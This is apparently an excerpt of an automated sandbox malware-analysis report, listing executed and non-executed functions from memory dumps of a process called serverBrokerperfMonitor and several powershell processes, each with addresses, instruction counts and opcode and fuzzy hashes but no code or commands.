                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: kx$kx
                                                                                                  • API String ID: 0-2436564140
                                                                                                  • Opcode ID: 1b5eea2079bfd8ec61d933b4f62e4ad697faa2528c7f31173a5a2dbb3b6eac6e
                                                                                                  • Instruction ID: 969ab68c2c2c3e13c057dea0e223dd60fbf7e38b7257a33c2e6ff275d1ca849a
                                                                                                  • Opcode Fuzzy Hash: 1b5eea2079bfd8ec61d933b4f62e4ad697faa2528c7f31173a5a2dbb3b6eac6e
                                                                                                  • Instruction Fuzzy Hash: 4E71C230A18A4D8FDBA8EF58C855BF97BE0FB59310F50413AE84DC7291DB74A985CB81
                                                                                                  Function 00007FFD9BB9D1DD Relevance: .1, Instructions: 102COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 300097d8a517503ff371a97fd7c75d2e6ee75466523536a1330e6d64048663d6
                                                                                                  • Instruction ID: 9e022aa874a67bc3a3caecde2684dd55d2d372770c68d7a7b8cedca3f766210d
                                                                                                  • Opcode Fuzzy Hash: 300097d8a517503ff371a97fd7c75d2e6ee75466523536a1330e6d64048663d6
                                                                                                  • Instruction Fuzzy Hash: C331F670E08A1D8FCF84DF98D451AEDBBF1FB69300F20116AE419E7291C735A941CB44

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9BAD431D Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3013952766.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: B
                                                                                                  • API String ID: 0-1255198513
                                                                                                  • Opcode ID: cacda09ab124fa5d354d1d26b232469e866f83a3746173266464a87597e93852
                                                                                                  • Instruction ID: 9c50634e8b1b441d720fa7253cb8142c1eaf8b36a4ea7647b31d1da837e51905
                                                                                                  • Opcode Fuzzy Hash: cacda09ab124fa5d354d1d26b232469e866f83a3746173266464a87597e93852
                                                                                                  • Instruction Fuzzy Hash: D5C10562A0F7C90FE766977848655A43FE0EF92220B0A02FFD499CB1B3DD58AD468351
                                                                                                  Function 00007FFD9BAD6605 Relevance: .4, Instructions: 440COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3013952766.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c06b8258cc9ad8493ee6b7ad1967dece1436fb857acf04c5fdad310782d05a8c
                                                                                                  • Instruction ID: 3e599c7dafeea6ed80738c68946d2379427ffb6f52f65ea27a0d21f7a5bac065
                                                                                                  • Opcode Fuzzy Hash: c06b8258cc9ad8493ee6b7ad1967dece1436fb857acf04c5fdad310782d05a8c
                                                                                                  • Instruction Fuzzy Hash: EDD14632B0EACE0FEB65DB6C48655B97BA1EF96314B0902FED45CC70E3D958A905C341
                                                                                                  Function 00007FFD9BAD4073 Relevance: .2, Instructions: 184COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3013952766.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c7efc6ec7f65befe762546745828f0adfc6dc0b63dfd167897d2194451833506
                                                                                                  • Instruction ID: 638238baf1a225921cc33271b08c1810fa07ef7168faf26f5f94cce31f0d6188
                                                                                                  • Opcode Fuzzy Hash: c7efc6ec7f65befe762546745828f0adfc6dc0b63dfd167897d2194451833506
                                                                                                  • Instruction Fuzzy Hash: F4511532B0EA8A0FEBA99B6C446257577D2EFD5220B1A02BFD15EC71B7DE14EC058341
                                                                                                  Function 00007FFD9BA09728 Relevance: .2, Instructions: 160COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3009745133.00007FFD9BA05000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA05000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9ba05000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3c8714378c6a6b5ff40ea07a5db77882c517f8b7de50409316e6dd0dc2b9311
                                                                                                  • Instruction ID: da732fff72ea4dfbdcbdc241fc2de1da9197d1f2e37e1bb33e6f77c9f0b6e834
                                                                                                  • Opcode Fuzzy Hash: a3c8714378c6a6b5ff40ea07a5db77882c517f8b7de50409316e6dd0dc2b9311
                                                                                                  • Instruction Fuzzy Hash: 81415071A0EB884FEB199F5C981A6E87BE0FF55300F50416FE08987197DA74AD05C7C2
                                                                                                  Function 00007FFD9B8EEE20 Relevance: .1, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3003451457.00007FFD9B8ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9b8ed000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6f562d5914f036899c060ae4db1497807786798221c4a2279423c120c6433e14
                                                                                                  • Instruction ID: 0249c368f33f6f155c020d0fe9155a3d567e86458e8cf4b49b9d5ce96faf2a24
                                                                                                  • Opcode Fuzzy Hash: 6f562d5914f036899c060ae4db1497807786798221c4a2279423c120c6433e14
                                                                                                  • Instruction Fuzzy Hash: 2B41577040EBC44FE7569B399855A523FF0EF57321F0605EFD088CB5A3D629A846C7A2
                                                                                                  Function 00007FFD9BAD40BF Relevance: .1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3013952766.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8ad2afa834706512c48698f5291d0bf95d292000eaf92383847500c00eecf872
                                                                                                  • Instruction ID: 465521eb631fd46c2aaba33c4d2958512a8efe13335eb6cfbd3531cac987728a
                                                                                                  • Opcode Fuzzy Hash: 8ad2afa834706512c48698f5291d0bf95d292000eaf92383847500c00eecf872
                                                                                                  • Instruction Fuzzy Hash: CE21C332B0EA8B0FE7B5DB58446257467D2EFA5210B5A02BEE05EC71F6DE18ED048341
                                                                                                  Function 00007FFD9BA0B4AC Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3009745133.00007FFD9BA05000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA05000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9ba05000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: acb180a30adacb385f8c7ccdeb68e416a456862925b4bb687684100606b4ba47
                                                                                                  • Instruction ID: 62249da342f5b8d7370b7b07c35ec1d6e7589781cf62d89d34d57aa1cfdeb4a6
                                                                                                  • Opcode Fuzzy Hash: acb180a30adacb385f8c7ccdeb68e416a456862925b4bb687684100606b4ba47
                                                                                                  • Instruction Fuzzy Hash: C621C631A0CA4C8FDB58DF9CD88A7F97BE0EBA9321F00412FD449C3255DA71A55ACB91
                                                                                                  Function 00007FFD9BAD43BC Relevance: .1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3013952766.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a836f9c719298b6d2f7d286f5d0c01e155b89a5e449a624dfc041c01c380d052
                                                                                                  • Instruction ID: ce328253b003ee6584b3d5d35805380d4ce29a286826c81eb19db67ea6e63d90
                                                                                                  • Opcode Fuzzy Hash: a836f9c719298b6d2f7d286f5d0c01e155b89a5e449a624dfc041c01c380d052
                                                                                                  • Instruction Fuzzy Hash: AA11BF32A0E9890FE7B4D75C84645B876D1EF80220B5A02BED45DC71B6DE55AD408340
                                                                                                  Function 00007FFD9BA033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3009745133.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction ID: fd0e0d0e09885213c395faa1ca4486af676892c803fc570850bcd53762d5f05f
                                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction Fuzzy Hash: 6F01677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5DB36E882CB46
                                                                                                  Function 00007FFD9BA09CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3009745133.00007FFD9BA05000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA05000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9ba05000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 93d8dd8a8e168029d025fcbce4771eb00118dc56aa72fa4bd2e2012780a47c12
                                                                                                  • Instruction ID: 60ea25334c394d1046093590784b9dcd89fd8fd167ddbc60eeed48c907ac51b8
                                                                                                  • Opcode Fuzzy Hash: 93d8dd8a8e168029d025fcbce4771eb00118dc56aa72fa4bd2e2012780a47c12
                                                                                                  • Instruction Fuzzy Hash: 3DF0243180868D8FDB06EF2888295D5BFA0EF27310F05029BE488C70B2DBA49558CB82
                                                                                                  Function 00007FFD9BA078ED Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3009745133.00007FFD9BA05000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA05000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9ba05000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b09d8db1cc1aa6bade495de96c6e867f506a63afb6e1decece3cb2ddb61410f3
                                                                                                  • Instruction ID: a8213db3735a37b08bb77fa90c8e434c17c9e433106aee2afc7ddd093a2a1148
                                                                                                  • Opcode Fuzzy Hash: b09d8db1cc1aa6bade495de96c6e867f506a63afb6e1decece3cb2ddb61410f3
                                                                                                  • Instruction Fuzzy Hash: B2E0CD2074D6894FD354965C94507B976C19F85310F54487DF4DD833D7C99C5D415353

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FFD9BA08BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3009745133.00007FFD9BA05000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA05000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9ba05000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                  • API String ID: 0-1500707516
                                                                                                  • Opcode ID: 615ba04035d24142b682f52b94d1645f05d7b2c927fd0fbea70c021a3e88cf23
                                                                                                  • Instruction ID: 481b3f85334ff1bb08ae2a37bc7a428d5540e389c1e6e94507e958443b483616
                                                                                                  • Opcode Fuzzy Hash: 615ba04035d24142b682f52b94d1645f05d7b2c927fd0fbea70c021a3e88cf23
                                                                                                  • Instruction Fuzzy Hash: 8D2137773044569EE30677ADB854DDC73C0CB9427638A47F3E169CB583ED1AA48B46C0

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9BAD39DC Relevance: 2.8, Strings: 1, Instructions: 1555COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.3001397492.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K_H
                                                                                                  • API String ID: 0-313846638
                                                                                                  • Opcode ID: 6537fafa0e428154c140369e4f411b59d9c603046929e7d6abd45b238ced7c61
                                                                                                  • Instruction ID: d162646325aefe28ef988ee56dec947a92a60df74d4863314004d3bd36b63fc1
                                                                                                  • Opcode Fuzzy Hash: 6537fafa0e428154c140369e4f411b59d9c603046929e7d6abd45b238ced7c61
                                                                                                  • Instruction Fuzzy Hash: 3DA22722B0EBCA0FE766976848655B47BE1EF96210B0A02FFD09DC71F3DD58AD468341
                                                                                                  Function 00007FFD9BA09D28 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: KL]
                                                                                                  • API String ID: 0-3031383875
                                                                                                  • Opcode ID: d6960f22c90cde837f5d442c6a02ce5af51362eca418acbb017b0840309b0e55
                                                                                                  • Instruction ID: 62c3abb5424153b1ea73f32e8e15ba6ef6a42e74ae6a75fda09d2d7ee97b29b9
                                                                                                  • Opcode Fuzzy Hash: d6960f22c90cde837f5d442c6a02ce5af51362eca418acbb017b0840309b0e55
                                                                                                  • Instruction Fuzzy Hash: B0F0E93190868C8FCB55DF5894285E47FE0FF2A200F0501E7D48DC7071D6649954C781
                                                                                                  Function 00007FFD9BAD6605 Relevance: .4, Instructions: 444COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.3001397492.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf9a4e4030d82d8d33e2b7d434e835125472f07b0be5b49210e50e34d1be4bfe
                                                                                                  • Instruction ID: d54d1a1736595366fc31ee984023bb540202a6fee51ea170228c1cf5316ea7b2
                                                                                                  • Opcode Fuzzy Hash: bf9a4e4030d82d8d33e2b7d434e835125472f07b0be5b49210e50e34d1be4bfe
                                                                                                  • Instruction Fuzzy Hash: 27D14632B0FACE0FEB659BAC48655B97BE0EF96214B0902FED45DC70E3D958A905C341
                                                                                                  Function 00007FFD9BA09FA5 Relevance: .4, Instructions: 387COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 72cf9f63858767fe46eecce4e94173bd93a53a93881231d16549982969d6a2df
                                                                                                  • Instruction ID: 15c87b48930779d7f388e3f7130b91b63c2d2a8aa74612f7deb7dd919316f16a
                                                                                                  • Opcode Fuzzy Hash: 72cf9f63858767fe46eecce4e94173bd93a53a93881231d16549982969d6a2df
                                                                                                  • Instruction Fuzzy Hash: A2513512B0E6DB4FE713BB6CA8F54E93BA09F13214B4A41F3D8D98E0A7DD195C498361
                                                                                                  Function 00007FFD9B8EED40 Relevance: .1, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2987812591.00007FFD9B8ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9b8ed000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8451974441e6585079bbd7e9fa7046d0c894a38259155c3cb43fc252391f1a2a
                                                                                                  • Instruction ID: f37e75220193062fbc2e5b3e9536d389c1b6d95b73c0c4b714beb86e1e7c311b
                                                                                                  • Opcode Fuzzy Hash: 8451974441e6585079bbd7e9fa7046d0c894a38259155c3cb43fc252391f1a2a
                                                                                                  • Instruction Fuzzy Hash: EE41387050EBC44FE39ADB3C98519523FF0EF56221B0A05DFD088CB4A3D625A809C7A2
                                                                                                  Function 00007FFD9BA0B8E8 Relevance: .1, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 484fb1c7392a23e46a30173f8b0252034762fb9bf44bd035b23e566bfcd7635a
                                                                                                  • Instruction ID: b4437ebce126f159722107b1a8dfd3cd1a07c4d9392513e6efa475cef0c5aaa9
                                                                                                  • Opcode Fuzzy Hash: 484fb1c7392a23e46a30173f8b0252034762fb9bf44bd035b23e566bfcd7635a
                                                                                                  • Instruction Fuzzy Hash: 45312E31A0DB4C4FEB69DFAC88596E97BE0EF56320F04416FD089C7162D6745849C751
                                                                                                  Function 00007FFD9BA097A8 Relevance: .1, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8de1d351b3227de58fecb6673677b8a74c4cc7b1461cea249381373a60e7f3f2
                                                                                                  • Instruction ID: 262ee15e9e97eb2a8bf0bc14878c19be0ada143eeeabfeabf589b46ad613b6ea
                                                                                                  • Opcode Fuzzy Hash: 8de1d351b3227de58fecb6673677b8a74c4cc7b1461cea249381373a60e7f3f2
                                                                                                  • Instruction Fuzzy Hash: AE319330A1CA0C9FDB1C9B4CA84AAA977E0FB99311F00422FE459D3251DB71A8568BC2
                                                                                                  Function 00007FFD9BAD40BF Relevance: .1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.3001397492.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f366b5ea978fe34eca9b10903781fed523eae00bc33e94a2b8d013e956b4d9c3
                                                                                                  • Instruction ID: d8f47eb7e71ad10fbef861f17ff4bdbf86233db7caac7f7d6f6466bef6e57df8
                                                                                                  • Opcode Fuzzy Hash: f366b5ea978fe34eca9b10903781fed523eae00bc33e94a2b8d013e956b4d9c3
                                                                                                  • Instruction Fuzzy Hash: 6521C332B0EA8B0FE7B5DB58446257466D2EFA5210B5A02BEE05EC71F6DE58ED048341
                                                                                                  Function 00007FFD9BAD43BC Relevance: .1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.3001397492.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21bd1e17c73857b2da485902534c3e0e31bb0d7207716d23f7365ddc89eec673
                                                                                                  • Instruction ID: d4296cca9deac2bad88ae731da78ae7774e44fc6b90d7877858ba6d12c6f5fce
                                                                                                  • Opcode Fuzzy Hash: 21bd1e17c73857b2da485902534c3e0e31bb0d7207716d23f7365ddc89eec673
                                                                                                  • Instruction Fuzzy Hash: F211BF32A0F9890FE7B4DB6C84745B876D1EF80220B5A02BED05EC71B6DE55AD408340
                                                                                                  Function 00007FFD9BA033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction ID: fd0e0d0e09885213c395faa1ca4486af676892c803fc570850bcd53762d5f05f
                                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction Fuzzy Hash: 6F01677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5DB36E882CB46

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FFD9BA08BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                  • API String ID: 0-1500707516
                                                                                                  • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                  • Instruction ID: 481b3f85334ff1bb08ae2a37bc7a428d5540e389c1e6e94507e958443b483616
                                                                                                  • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                  • Instruction Fuzzy Hash: 8D2137773044569EE30677ADB854DDC73C0CB9427638A47F3E169CB583ED1AA48B46C0

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B9F604D Relevance: .8, Instructions: 838COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a0ccbfb420b7257a97b5e306c7738f8b0b022a58743c0bddf0909f462de33642
                                                                                                  • Instruction ID: 058c7ea8c4154b9c259e36c0e4e6993867fa8df3d00afa36ee085cd3a4f3ecb2
                                                                                                  • Opcode Fuzzy Hash: a0ccbfb420b7257a97b5e306c7738f8b0b022a58743c0bddf0909f462de33642
                                                                                                  • Instruction Fuzzy Hash: 6FD12917F1E6A75BE321B7ACA8B54E93FA0DF9127670901B7D1C9C60A3E905690AC3D0
                                                                                                  Function 00007FFD9B9FB268 Relevance: .5, Instructions: 463COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 50c71317339ff5811f36f7e55a0efef4b6ebcfb30681434c0d51bacf5eceea23
                                                                                                  • Instruction ID: 888e48b8f9af72ca6e94ed77a770548282337af889f7eb717d5ac91f3a4d4537
                                                                                                  • Opcode Fuzzy Hash: 50c71317339ff5811f36f7e55a0efef4b6ebcfb30681434c0d51bacf5eceea23
                                                                                                  • Instruction Fuzzy Hash: D0D14730B2DA4D4FD798EF5CC895AB57BE1EF95320F1001BED08AC32A6DA25E846C741
                                                                                                  Function 00007FFD9BAC6605 Relevance: .4, Instructions: 443COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6fa83544fdffa94e3ad9004ce5754766ce652f296fb632221bcd1e0963bcf64
                                                                                                  • Instruction ID: 5ea6798ae4e225f826eadf10a4d79de704d6ca08a47e7dbeaa4262d6efb7c088
                                                                                                  • Opcode Fuzzy Hash: b6fa83544fdffa94e3ad9004ce5754766ce652f296fb632221bcd1e0963bcf64
                                                                                                  • Instruction Fuzzy Hash: FDD13532B0EA8E0FEBA5EB6C48655B57BA0EF66314B1901FED45DC70E3D958AC05C341
